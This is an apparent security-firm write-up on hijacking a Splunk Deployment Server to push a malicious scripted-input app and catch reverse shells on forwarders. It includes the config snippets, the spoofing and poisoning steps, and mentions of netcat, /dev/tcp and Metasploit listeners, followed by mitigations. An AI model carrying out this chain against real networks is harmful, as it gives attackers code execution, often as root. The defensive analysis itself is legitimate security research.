Exploiting Scripted and Modular Inputs
Splunk scripted and modular inputs are powerful tools when leveraged properly: they allow a user to run a script on a remote endpoint and log the script's stdout to Splunk, or to trigger an alert action. Splunk also provides a simple configuration-distribution facility in the form of the Deployment Server.
When the two are combined and used maliciously, they become an open door: an attacker can reach any system running a Splunk daemon that is connected to a Deployment Server and execute arbitrary code as the user running that daemon.
This document explains the extent of the vulnerability, demonstrates how to exploit it in a distributed Splunk environment managed by a Deployment Server, and discusses possible mitigation steps.
To fully understand this document, we assume you have:
- A working understanding of Splunk architecture and basic utilization
- Understanding of security concepts such as ARP-spoofing and DNS Poisoning
- Basic understanding of networking fundamentals
At this point, most organizations employ some form of log-management or SIEM solution; for the purposes of this document, our victim has Splunk deployed. With the increased use of Splunk in the security space, a number of concerns have been raised about the level of access granted to an application that uses a modular or scripted input. Splunk perhaps didn't anticipate what naturally happens in our community: we see an issue and work out what can be done with it. These input types are extremely powerful when used for their intended purpose, but as with all things, once you move out of scope of the intended use, the fun begins.

One critical concern is the ease and level of access these methods afford an insider. We would all love to believe our security infrastructure is robust, but how many companies do you know that look for exploitation and misuse of the very services, applications, and servers purchased to protect them?
The environment used for the PoC of this known Splunk vulnerability consists of the following devices:
- 10 indexers running Splunk 6.4.3
- 1 search head running Splunk 6.4.3
- 1 deployment server running Splunk 6.4.3
- An unknown number of remote forwarders running the Splunk Universal Forwarder 6.4.3 package
The first step toward remote command execution on a remote Splunk endpoint is to create our "weaponized" scripted-input application, which we will use throughout this article.
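For orientation, a scripted-input app is just a directory under `$SPLUNK_HOME/etc/apps/` containing an `inputs.conf` and the script it points at. A minimal skeleton looks like the following; the app and script names here are illustrative, not the names used in the original PoC:

```ini
# $SPLUNK_HOME/etc/apps/weaponized_app/default/inputs.conf
# (app and script names are illustrative)
[script://./bin/run.py]
disabled = 0
interval = 60            # re-run the script every 60 seconds
sourcetype = demo:script
```

Whatever `bin/run.py` writes to stdout is indexed as events; the same mechanism is what executes arbitrary code as the user running splunkd.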
To go further, we need to apply our understanding of how Splunk works to find the right attack vector.
As we can see from this diagram from Splunk's own documentation, the deployment server (DS) has a great deal of power over the servers and endpoints it controls. The DS is OS-independent, meaning it can manage endpoints regardless of their host OS. That said, it can only modify files within $SPLUNK_HOME.
To leverage this level of access, we need to become the DS. Assuming we are already inside the network, this can be done in a number of ways:
- Use the Splunk REST API to repoint the deployment client at an attacker-controlled DS
- ARP-spoof the network to "become" the router and man-in-the-middle the traffic between the deployment clients and the DS
- DNS-poison the network so that the DS hostname resolves to a host we control
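Whichever route is taken, the end state is the same: the client's `deploymentclient.conf` effectively resolves to our host. For reference, this is the stanza that controls which DS a client polls (the hostname below is illustrative):

```ini
# $SPLUNK_HOME/etc/system/local/deploymentclient.conf on a forwarder
[deployment-client]

[target-broker:deploymentServer]
# With DNS poisoning, this legitimate name now resolves
# to the attacker-controlled machine.
targetUri = deploy.example.corp:8089
```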
In this document we will assume the DNS-poisoning method has succeeded and that we are now the deployment server in the eyes of the network's devices. At this point we want a Splunk instance of our own, running and configured to act as a DS, so that we can control the deployment clients (the remote devices).
Once we have established our role as the malicious Deployment Server, we can write a new serverclass to push out our application. The configuration in the image to the right will suffice for our purposes, but now we have to make a decision: do we want to be easily detectable and destructive, or do we want to maintain some level of anonymity? The answer determines the direction you take post-compromise. If you are not worried about detection, use the shells pushed to the remote devices, wait for your back-connect shell to pop, and claim your prize.
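A serverclass that pushes the app to every client phoning home can be as small as this sketch (the class and app names are illustrative):

```ini
# serverclass.conf on the rogue deployment server
[serverClass:pushAll]
whitelist.0 = *                       # match every deployment client

[serverClass:pushAll:app:weaponized_app]
stateOnClient = enabled               # enable the app on arrival
restartSplunkd = true                 # restart so the input starts running
```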
Creating the Listener:
We have now successfully pushed our shell app out to the remote devices, so we need a handler for the back-connect to communicate with. You can use netcat, raw sockets via /dev/tcp, or even the Metasploit reverse_tcp exploit handler; this document covers netcat.
Using the commands and configuration above, we now have an active listener ready to accept connections. Once the app has been pushed to the endpoints, the Python code executes, our listener catches the outbound connection from the remote machine, and a shell is spawned as the user running Splunk. In a properly configured environment this would be the non-privileged "splunk" user. In practice, however, sysadmins can be lazy and do not want to deal with the ACLs needed to let Splunk read files in /var/log. As a result, the Splunk Universal Forwarder is often running as root, and you have just gained full root execution.
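Whether you have landed as root or as the splunk user is trivial to confirm from the shell you receive:

```shell
# From the spawned shell, confirm which account you landed as.
# If splunkd was started as root, this prints "root".
id -un
```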
The figure below illustrates a successful exploitation of this known Splunk vulnerability:
As you can see above, scripted and modular inputs in Splunk are very powerful tools, but in the wrong hands they can be a devastating pivot.
The best damage mitigation here is to ensure that your Splunk installs run as non-privileged users, but that still does not address the issue as a whole. The app we used was approved for public consumption on Splunkbase, Splunk's app store; it is clear that, as of this writing, Splunk has not received the pressure necessary to take the security posture of its products as seriously as perhaps it should. The application was later removed once the situation gained notoriety, but it is still publicly available on GitHub and can be pushed to any Splunk endpoint through the DS, or through a cluster master if you want to reach all clustered indexers.
Splunk needs to take action in the core product if this is ever going to be handled. One remediation would be strong SSL authentication of the Deployment Server by the DS clients, reducing the possibility of a MITM or spoof. Another would be to require that apps be digitally signed by Splunk before a modular/scripted input in an app is granted execution permission. A proper digital-signature approach would greatly increase the attacker's difficulty, even if they managed to take over the production Deployment Server.
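On the SSL-authentication point: Splunk's client-side configuration does expose TLS-verification settings, though their names and availability vary by version and should be checked against the `deploymentclient.conf.spec` shipped with your release. A sketch of the idea, with an illustrative hostname and path:

```ini
# deploymentclient.conf on each client -- verify the DS's certificate
# (setting names vary by Splunk version; confirm against the .spec file)
[deployment-client]
sslVerifyServerCert  = true
sslCommonNameToCheck = deploy.example.corp
caCertFile           = $SPLUNK_HOME/etc/auth/cacert.pem
```

With verification enforced against a private CA, a DNS-poisoned or ARP-spoofed "deployment server" cannot present a trusted certificate, and the client refuses the connection.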
The information contained in this paper is provided by the author, and is provided for educational and informational purposes only. The author accepts no liability for any misuse or malicious use of this information.
Aditum is a Splunk consulting firm focused on Splunk professional services, including Splunk deployment, ongoing Splunk administration, and Splunk development. Aditum also has a separate division offering Splunk recruitment and the placement of Splunk professionals into direct-hire (FTE) roles, for companies that need help acquiring full-time staff in today's challenging market.
Contact us to learn more.